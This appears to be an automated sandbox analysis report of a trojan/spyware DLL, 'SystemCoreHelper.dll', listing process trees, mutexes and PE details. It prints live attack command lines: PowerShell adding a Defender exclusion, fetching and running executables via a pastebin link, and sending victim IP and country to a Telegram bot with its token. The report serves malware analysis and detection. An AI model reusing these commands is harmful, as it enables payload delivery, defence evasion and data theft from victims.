Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025D29C6	26_2_025D29C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025BFF7F	26_2_025BFF7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025ACE52	26_2_025ACE52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025A8E50	26_2_025A8E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025D9E40	26_2_025D9E40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025D2615	26_2_025D2615
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025C6E00	26_2_025C6E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025C96F4	26_2_025C96F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025BF6E0	26_2_025BF6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025A96A0	26_2_025A96A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025E2F40	26_2_025E2F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025BFF7F	26_2_025BFF7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025C6F70	26_2_025C6F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025DD710	26_2_025DD710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025A4F05	26_2_025A4F05
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025AE7D9	26_2_025AE7D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025C87D0	26_2_025C87D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025BC7C9	26_2_025BC7C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025BEFF5	26_2_025BEFF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025CEF87	26_2_025CEF87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025CE7BB	26_2_025CE7BB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025BBFB6	26_2_025BBFB6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025D0C1C	26_2_025D0C1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025C5410	26_2_025C5410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025C0C90	26_2_025C0C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025A3570	26_2_025A3570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025CFD65	26_2_025CFD65
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025A6D60	26_2_025A6D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025C9520	26_2_025C9520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025A55F8	26_2_025A55F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025C05F0	26_2_025C05F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025CB588	26_2_025CB588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_2_025BB5A1	26_2_025BB5A1
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Code function: 30_2_00582430	30_2_00582430
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Code function: 30_2_00583090	30_2_00583090
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Code function: 30_2_0059BC80	30_2_0059BC80
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Code function: 30_2_0059F550	30_2_0059F550
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Code function: 30_2_0059C920	30_2_0059C920
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Code function: 30_2_005841A0	30_2_005841A0
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Code function: 30_2_0059C5A0	30_2_0059C5A0
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Code function: 30_2_02813691	30_2_02813691
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Code function: 30_2_0281BA58	30_2_0281BA58
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Code function: 30_2_02816B30	30_2_02816B30
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Code function: 30_2_02810888	30_2_02810888
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Code function: 30_2_02812470	30_2_02812470
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Code function: 30_2_02812D19	30_2_02812D19
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Code function: 30_2_0281C920	30_2_0281C920
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Code function: 30_2_02814530	30_2_02814530
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Code function: 30_2_02815E98	30_2_02815E98
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Code function: 30_2_02815EA8	30_2_02815EA8
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Code function: 30_2_028166E8	30_2_028166E8
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Code function: 30_2_0281235A	30_2_0281235A
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Code function: 30_2_02811889	30_2_02811889
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Code function: 30_2_028164C8	30_2_028164C8
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Code function: 30_2_0281A1C8	30_2_0281A1C8
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Code function: 30_2_0281A950	30_2_0281A950
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Code function: 30_2_02816960	30_2_02816960
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Code function: 30_2_0059DA10	30_2_0059DA10

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Roaming\gdi32.dll 1287FC59877EDEABFCCCDCB48ADCC0D626A12A4F466F496551859ACD5E8E95C2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 025B90C0 appears 58 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 025A83F0 appears 39 times

Source: C:\Windows\Temp\zbjnkzvo4cc.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8012 -s 1232

Source: SystemCoreHelper.dll

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL

Source: zbjnkzvo4cc.exe.17.dr	Static PE information: Section: m@ka ZLIB complexity 1.0003175535402098
Source: mxtvcgq32fe.exe.19.dr	Static PE information: Section: m@ka ZLIB complexity 1.0003175535402098

Source: SystemCoreHelper.dll, JQAlCrJUDBBaZfiZASnKxQXAXPFvBTlZdUcCeDph.cs	Base64 encoded string: 'U1Fpbkg0dlRhcnUyeEppZ3VidEo3elcya3h2M2VGMTU3WGxSWDB5S251L21Rb0VKdlU1dXZHLzJjck03eDY3cEJZV0p5cHNPcGxjVFNWOUpKdnFCWDhwcEVsaDhhTzFJMWZSYWY3S0tHeExqRHlmTDgwVjVpWUxBWjZZdjJ6NkhPcUlOSHZBQTZEL3Z6R3h1REsrREQyemxOOFhXaWxpRGhTV0l5TXEzcjJaSHV3SHlUWWsvZDJYZ3l1WmNNeFpHWGsySmtYTVFnbm1JWWRvZGpkalNIRG5MRFk3MCtGUGxwTW9Yd3IycjZaQjIyOEVGVElDZEdXVnBlMGNiMWRZTDAvTEZENm4yQVk1ZmUvVWJ6bEV2WDNkVG16S0RXTEc2TTdlMGtuNE9qZVBLN211eGVMdUgvUS8wWkhtVTR6TWxrQXhBaHM5b3l6NXQvamh2cWtMaEJYOFoycHdqZjNLeXQ3K3hBMXNEUW9VTkJXVFNEL2Y1eDhhOGloTFhoZVNmdGhrZkcrenNUMG92eGpNdmlsR0JKcjh6QzlsVERQTkg3cENlc0dwQ3FZUTZCRmM2VVJyWjBaSzd0bE9BL3JIRHEyYmtMNGhDcFRlcVpBb2tmTnpMS2hkbkJ1Tk9xaUIzR2pLZDdmempSSTJRTjVoWEVDL09Ybk5XelZGeFAvU2R6RWk3V0MxYm9XcGM5WW5uMlMzQTlMWVpIeHZzN0U5S0w4WXpMNHBSZ1NieEhYRGtSbDltb1R5ZnBabkRheUo2RVJZWkVyNkRFM2IrME9ENk1qOU1VVEdxT0ZaSDBBN2ZGYU8vRUQyQzc1Z2NLS1FIbXpOemkxbExnQmw2RGlzTGVUUk90MlF5dmRXWm9HQ0ZCY29DTTZadE8waVdudEVUNzdoQng3cjkvdEgza0JOUy9NZ3gwWlBqWUZobXFJdWRLYVFUWGo1ZUZPSGtoM2pveStncFZzMGNnODNCUVlUcGcwY09xcmlZaDVSS2RXTENrTktKSW1FNEp1M0c0bkNNZXE0c3RRRjJzMGQ0c1VHakZTWUU3M3NHeGF0cTk5SUsrU2RTQzFMSnUzZ2JsUG55d2RxRi8vS3FQeGlhREtuVlBsOXlvbU4xYy9lcHltbXd1Nk1tR0pFOENmU09KTXZST2hPcVREdXlYWGZyUjJQUDRwZVJTamRvTHJKOE12ekhYU3hjbnhxamhzU3dwT251N2NoMFBndk5sa2M2b3p4N0l6Skd6d3JBdVBzbnEwOTZxNXNWeGpoY3lHT2ZEZGtUTEptTVhSOEd4MnUzdnI5Wm1oc09uZTlvM0NVdktQb1hxaHpUUkVTSU5kNmJSSWw0d1JLTnBDUkpCWkR2dDhmUTRXUHczRjhnbXhVdXBiUWlMYURmTmh1VStmTEIyb1gvOHFvL0dKb01xZFZhNVc3YmN1NTJ0S0plaVpBVmxqcmxVZjNlVkEwUDREaW9PcVdGZGVWR3Fycm5IcDBnK2NGaE82dzFVcUJ3M2FvUlF5ZVRoWExJYzhKVk5mQlhGTEFBeHBzVjVjRnE1S1hTbFQ5V1dWRkxQekV2N0h1WldhQ2VmTGVxbHhtb1NPVCthRFhuNzJGazZhWDVEcTJhWXFaK0VVTW5rNFZ5eUhQQ1ZUWHdWeFN3QU52ZnBRRndNN3k2MGg4SVV1QkgwRm0wT3AxRTZPSmw5eUZ3bzZ3aUdmRHVuTncxVG93NGszVFpaamJtdVBzVnZWS0V5Uk9aSjZHaTFpVXpsbXZ0L1VOSnpUaVE3Z3FwcW8xbkhQR29kWUY0T0w4YUFGd3R0SVgySnVLVXJLZHdHSWRESU9SMXp3TGwxZGhTalVzdmpEOFpQTEI1YzRQV2YrYk5ZdkhGNXQ4bnVISEQxdS9ISkh4bFoyMFIrZW90YmZSZ0w2NERyMGhFVi9kOE9XZlpyMlc4NEExU2Z2NEg2dFptdGRiUWw0dGpHNVQ1OHNIYWhmL3lxajhZbWd5cDFZamxYSG5FOFZDMCs2ayt6bFdrODZZUlF5ZVRoWExJYzhKVk5mQlhGTEFBa1M0NzFncmVYTWc3NUZjSkdjc245SHdiNXZxdVpUSWY1akJ6SVYzaDlQbm4rZFRjejFoSnJWTEFzYzZQSkEvNEhSQnd0K3gvaWwwcjM2WnhZL253WUN6VFk1V2xTWURWeG8wRXlhaWVyZVB1L00wVHVvcFhxZmlFcnZkVU9xZDRyTGh4QklJUXRVSElVOWgvV053NmlCNm8wVkZhNnpRSzVYVitxWGJxeXZ5b1VOY0xtYUlhNzdCS0l1NXFGU0kzV24rWHhDdi9rSmVISkVMUDE5aWcxeXlnbUllanRwN1pPaVRhOUZNcnJOZkh3UGoxbFF3ZFVsSGI1NjB4ZVlHV3pTR0JJK01Jbnkvb3NVaGxybUpqR3RvTnhSNDIzb1NXdHNKbW10VkNIbElMdmtnUGxzcm1reWNUNVFSemRIYXRNbWJHZ1N0aStoaXA1V0c5VUNFV0d4UDNRV1l6L1djMU8rOVlyd3ZPUFVsRFNzNHBFaG9OVHNJdm9UYWdkdlIvdVpIdDV3M2NOR3JJQ0grWjFib1IwN2hjNi9uOTM5QnVBQVdBRkJTejRKYXl5ZitEOFliV0VxSjBneDArZjFOdkVHOHlwajVWanZvZU9renhyMzR1OHhPZFlVM09ocFdKUDZrcERiNm9XZWFDY0Y5YlJhQUNJaXhmaGIvNUNkeENrd0JLU2ZBN2VwYVp5d2dWZjAwN2JzS2ZXby9GR200VW12NXhtUnVyaWVlMUFCaDJUaUVGL0ZEcTd2eHpIcCtSeU5qa2M2N0hYNTBrbzNSZnd5NHJyVytVL2RtbVVOUWgxejFKcFRTQi90RHlKRk8vU1ZyN0tSYzRXTHFMaGRXZy9Nb3VzM2ZMNnB1T1Foc1RzSjZ5cmtuRklSTlBxZ1R3STJLb3VIamF0UVZaR2NhbzhSYmdES3lRSE9jdmhBYXg4Y1hURVpTL2d
Source: SystemCoreHelper.dll, fxGXYVQTdjJepCvWmrhZgFfiJXNdKaeubtHoHvLv.cs	Base64 encoded string: 'ZQ5ygZRV4qJ9XsgS3aRaSr8YfcKV1QXniGwl8u2ofkE8eCj09cwVbIWncwfd/45k', 'pnuYn+zi4sosT9XUATblVIadA8A4/5I18tfSRpje2mbevOt4IY/oskmB5Lrq1ewj'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winDLL@60/52@5/6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 26_2_025DAAE0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

26_2_025DAAE0

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8020:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:772:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2756:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8012
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2088:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7240:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2892:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5960:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2836:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6656
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Users\user\AppData\Local\Temp\1ixib5wl

Jump to behavior

Source: SystemCoreHelper.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SystemCoreHelper.dll

Static file information: TRID: Win32 Dynamic Link Library (generic) Net Framework (1011504/3) 44.80%

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SystemCoreHelper.dll,GetCompiled

Source: aspnet_regiis.exe, 0000001A.00000003.2023475967.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: SystemCoreHelper.dll

ReversingLabs: Detection: 18%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SystemCoreHelper.dll,GetCompiled
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES42BA.tmp" "c:\Users\user\AppData\Local\Temp\1ixib5wl\CSC291E15774B6A482B9669CEACC9B56C.TMP"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll",GetCompiled
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4E05.tmp" "c:\Users\user\AppData\Local\Temp\juqgin2j\CSCBFD98E15EAE94B1A9A3E8A6348847C3D.TMP"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\mxtvcgq32fe.exe')"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\Temp\zbjnkzvo4cc.exe "C:\Windows\Temp\zbjnkzvo4cc.exe"
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8012 -s 1232
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\Temp\mxtvcgq32fe.exe "C:\Windows\Temp\mxtvcgq32fe.exe"
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6656 -s 1212
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/ip'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/ip'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/country'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/country'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002361597694&text=NEW%20LOGS!%0ABuild%20%3D%3E%20bbs%0AIP%20%3D%3E%208.46.123.75%0ACountry%20%3D%3E%20US'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002361597694&text=NEW%20LOGS!%0ABuild%20%3D%3E%20bbs%0AIP%20%3D%3E%208.46.123.75%0ACountry%20%3D%3E%20US'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SystemCoreHelper.dll,GetCompiled	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll",GetCompiled	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\Temp\zbjnkzvo4cc.exe "C:\Windows\Temp\zbjnkzvo4cc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/ip'"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/country'"	Jump to behavior
